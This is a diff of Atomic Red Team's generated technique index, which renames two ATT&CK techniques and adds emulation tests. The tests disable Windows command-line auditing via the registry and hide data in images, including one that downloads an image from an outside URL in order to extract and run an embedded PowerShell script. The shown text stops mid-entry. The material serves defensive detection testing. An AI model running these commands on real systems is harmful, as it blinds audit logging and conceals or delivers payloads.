 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -36,7 +36,7 @@
 |  | Serverless Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Steal or Forge Authentication Certificates](../../T1649/T1649.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Providers](../../T1547.003/T1547.003.md) | [Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md) | [Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) |  | Code Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  | [System Services: Service Execution](../../T1569.002/T1569.002.md) | [Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md) | [Password Policy Discovery](../../T1201/T1201.md) |  | Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) |  | SNMP (MIB Dump) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
 |  |  | [Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | [Steal Application Access Token](../../T1528/T1528.md) | [Query Registry](../../T1012/T1012.md) |  | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create Process with Token](../../T1134.002/T1134.002.md) | [Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md) | [Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | [Create or Modify System Process: Launch Daemon](../../T1543.004/T1543.004.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -109,7 +109,7 @@
 |  |  | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) |  | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
 |  |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) |  | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
+|  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) |  |  |  |  |  |  |  |
@@ -36,7 +36,7 @@
 |  |  | [Time Providers](../../T1547.003/T1547.003.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Impair Defenses](../../T1562/T1562.md) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) |  |  |  | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) |  |
 |  |  | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) |  |  |  | [Ingress Tool Transfer](../../T1105/T1105.md) |  |
-|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
+|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Discovery](../../T1046/T1046.md) |  |  |  | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) |  |
 |  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Discovery](../../T1518/T1518.md) |  |  |  | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
 |  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Process Injection](../../T1055/T1055.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) |  |
 |  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) |  |  |  | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |
@@ -86,7 +86,7 @@
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
 |  |  | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) |  | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
-|  |  |  |  | Impair Defenses: HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) |  |  |  |  |  |  |  |
@@ -8018,7 +8018,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -37515,7 +37515,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -37537,6 +37537,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -7993,7 +7993,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -36790,7 +36790,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36812,6 +36812,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -7922,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -36410,7 +36410,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36432,6 +36432,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -7922,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -36236,7 +36236,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36258,6 +36258,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -7922,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -36709,7 +36709,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36731,6 +36731,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -7922,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -36867,7 +36867,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36889,6 +36889,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -7922,7 +7922,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -36776,7 +36776,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -36798,6 +36798,7 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
+      identifier: T1001.002
    atomic_tests: []
  T1008:
    technique:
@@ -18208,7 +18208,7 @@ defense-evasion:
  T1562.003:
    technique:
      modified: '2023-03-30T21:01:47.940Z'
-      name: 'Impair Defenses: HISTCONTROL'
+      name: 'Impair Defenses: Impair Command History Logging'
      description: "Adversaries may impair command history logging to hide commands
        they run on a compromised system. Various command interpreters keep track
        of the commands users type in their terminal so that users can retrace what
@@ -18493,6 +18493,67 @@ defense-evasion:
        cleanup_command: 'unset HISTIGNORE

          '
+    - name: Disable Windows Command Line Auditing using reg.exe
+      auto_generated_guid: 1329d5ab-e10e-4e5e-93d1-4d907eb656e5
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack executes reg.exe using a command prompt, this attack can be detected by monitoring both:
+          Process Creation events for reg.exe (Windows Event ID 4688, Sysmon Event ID 1)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          echo Commencing Attack - Disabling Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 0 /f
+        cleanup_command: |
+          echo Commencing Cleanup - Restoring Registry Value
+          reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
+    - name: Disable Windows Command Line Auditing using Powershell Cmdlet
+      auto_generated_guid: 95f5c72f-6dfe-45f3-a8c1-d8faa07176fa
+      description: |
+        In Windows operating systems, command line auditing is controlled through the following registry value:
+
+          Registry Path: HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit
+          Registry Value: ProcessCreationIncludeCmdLine_Enabled
+
+        When command line auditing is enabled, the system records detailed information about command execution, including the command executed, the user account responsible for executing the command, and the timestamp of the execution.
+        This information is crucial for security monitoring and forensic analysis, as it helps organizations detect and investigate unauthorized or malicious activities within their systems.
+        By default, command line auditing may not be enabled in Windows systems, and administrators must manually configure the appropriate registry settings to activate it.
+        Conversely, attackers may attempt to tamper with these registry keys to disable command line auditing, as part of their efforts to evade detection and cover their tracks while perpetrating malicious activities.
+
+        Because this attack runs a Powershell cmdlet, this attack can be detected by monitoring both:
+          Powershell Logging (Windows Powershell Event ID 400, 800, 4103, 4104)
+          Registry events (Windows Event ID 4657, Sysmon Event ID 13)
+
+        Read more here:
+        https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-220703123711.html
+        https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/new-itemproperty?view=powershell-7.4#example-2-add-a-registry-entry-to-a-key
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: |
+          echo "Commencing Attack - Disabling Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 0 -PropertyType DWORD -Force -ErrorAction Ignore
+        cleanup_command: |
+          echo "Commencing Cleanup - Restoring Registry Value"
+          New-ItemProperty -Path "HKLM:Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" -Name "ProcessCreationIncludeCmdLine_Enabled" -Value 1 -PropertyType DWORD -Force -ErrorAction Ignore
  T1556.008:
    technique:
      modified: '2023-05-04T18:02:51.318Z'
@@ -74227,7 +74288,7 @@ command-and-control:
          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
        source_name: University of Birmingham C2
      modified: '2020-03-15T00:37:58.963Z'
-      name: Steganography
+      name: Data Obfuscation via Steganography
      description: 'Adversaries may use steganographic techniques to hide command
        and control traffic to make detection efforts more difficult. Steganographic
        techniques can be used to hide data in digital messages that are transferred
@@ -74249,7 +74310,156 @@ command-and-control:
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_data_sources:
      - 'Network Traffic: Network Traffic Content'
-    atomic_tests: []
+      identifier: T1001.002
+    atomic_tests:
+    - name: Steganographic Tarball Embedding
+      auto_generated_guid: c7921449-8b62-4c4d-8a83-d9281ac0190b
+      description: "This atomic test, named \"Steganographic Tarball Embedding\",
+        simulates the technique of data obfuscation via steganography by embedding
+        a tar archive file (tarball) \nwithin an image.\n\nThe test begins by ensuring
+        the availability of the image file and the tarball file containing data .
+        It then generates random passwords and saves them to a \nfile. Subsequently,
+        the tarball file is created, containing the passwords file. The test executor
+        command reads the contents of the image \nfile and the tarball file as byte
+        arrays and appends them together to form a new image file. This process effectively
+        embeds the tarball \nfile within the image, utilizing steganography techniques
+        for data obfuscation.\n\nThis atomic test simulates the technique of data
+        obfuscation via steganography, enabling attackers to clandestinely transfer
+        files across systems undetected. \nBy embedding the tarball file within the
+        image, adversaries can obscure their activities, facilitating covert communication
+        and data exfiltration.\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Image file which will be downloaded to be used to hide data
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\T1001.002.jpg
+        tar_file:
+          description: Tarz file containing random passwords
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002.tarz"
+        new_image_file:
+          description: new image file ready for extraction
+          type: path
+          default: "$env:PUBLIC\\Downloads\\T1001.002New.jpg"
+        passwords_file:
+          description: Text file containing random passwords
+          type: path
+          default: "$env:TEMP\\random_passwords.txt"
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/a9617d9fce289909441120a1e0366315c2c5e19d/lime.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile "#{image_file}"
+      - description: 'File to hide within tarz file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{passwords_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: "Write-Output \"Generating random passwords and saving
+          to file...\"\n$passwords = 1..10 | ForEach-Object { Get-Random -InputObject
+          ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-_=+[]{}|;:,.<>?')
+          -Count 12 }\n$passwords | Out-File -FilePath \"#{passwords_file}\"    \n"
+      - description: "Tarz file to embed in image must exist \n"
+        prereq_command: |
+          if (!(Test-Path "#{tar_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          Write-Output "Generating tarz file..."
+          tar -cvf "#{tar_file}" "#{passwords_file}"
+      executor:
+        name: powershell
+        elevation_required: true
+        command: 'Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount
+          0 | Set-Content "#{new_image_file}" -Encoding byte
+
+          '
+        cleanup_command: |
+          Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore
+          Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore
+    - name: Embedded Script in Image Execution via Extract-Invoke-PSImage
+      auto_generated_guid: 04bb8e3d-1670-46ab-a3f1-5cee64da29b6
+      description: "This atomic test demonstrates the technique of data obfuscation
+        via steganography, where a PowerShell script is concealed within an image
+        file. \nThe PowerShell script is embedded using steganography techniques,
+        making it undetectable by traditional security measures. The script is hidden
+        \nwithin the pixels of the image, enabling attackers to covertly transfer
+        and execute malicious code across systems.\n\nThe test begins by ensuring
+        the availability of the malicious image file and the Extract-Invoke-PSImage
+        script. The test proceeds to extract the hidden \nPowerShell script (decoded.ps1)
+        from the image file using the Extract-Invoke-PSImage tool. The extracted script
+        is then decoded from base64 encoding and saved as a \nseparate PowerShell
+        (textExtraction.ps1). Consequently, the textExtraction.ps1 script is executed.\n\nIn
+        the case of this atomic test, the malicious image file which is downloaded
+        has the powershell command Start-Process notepad embedded within in base64.
+        This\nis done to emulate an attackers behaviour in the case they were to execute
+        malware embedded within the image file. \n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        image_file:
+          description: Malicious Image file which will be downloaded
+          type: path
+          default: PathToAtomicsFolder\T1001.002\bin\evil_kitten.jpg
+        psimage_script:
+          description: Extract-Invoke-PSImage Script downloaded
+          type: path
+          default: PathToAtomicsFolder\ExternalPayloads\Extract-Invoke-PSImage.ps1
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Image file must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{image_file}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
+          New-Item -Type Directory (split-path "#{image_file}") -ErrorAction Ignore | Out-Null
+          Write-Output "Downloading image file..."
+          $imageUrl = "https://github.com/raghavsingh7/Pictures/raw/f73e7686cdd848ed06e63af07f6f1a5e72de6320/evil_kitten.jpg"
+          Invoke-WebRequest -Uri $imageUrl -OutFile #{image_file}
+      - description: 'Extract-Invoke-PSImage must exist
+
+          '
+        prereq_command: |
+          if (!(Test-Path "#{psimage_script}")) {exit 1} else {
+          {exit 0}
+          }
+        get_prereq_command: |
